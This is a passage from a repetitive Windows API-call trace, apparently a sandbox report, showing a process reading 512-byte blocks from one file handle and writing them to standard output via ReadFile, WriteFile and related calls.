(_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.237] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.238] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, 
lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] GetFileType (hFile=0x50) returned 0x1 [0132.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.238] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.238] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.239] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 
0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] GetFileType (hFile=0x50) returned 0x1 [0132.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.239] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.239] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.239] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.240] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) 
returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.240] GetFileType (hFile=0x50) returned 0x1 [0132.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.240] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.240] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.240] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.241] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] GetFileType (hFile=0x50) returned 0x1 [0132.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.241] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.242] ReadFile 
(in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] GetFileType (hFile=0x50) returned 0x1 [0132.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.242] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.242] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.243] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, 
lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, 
lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.244] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.244] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, 
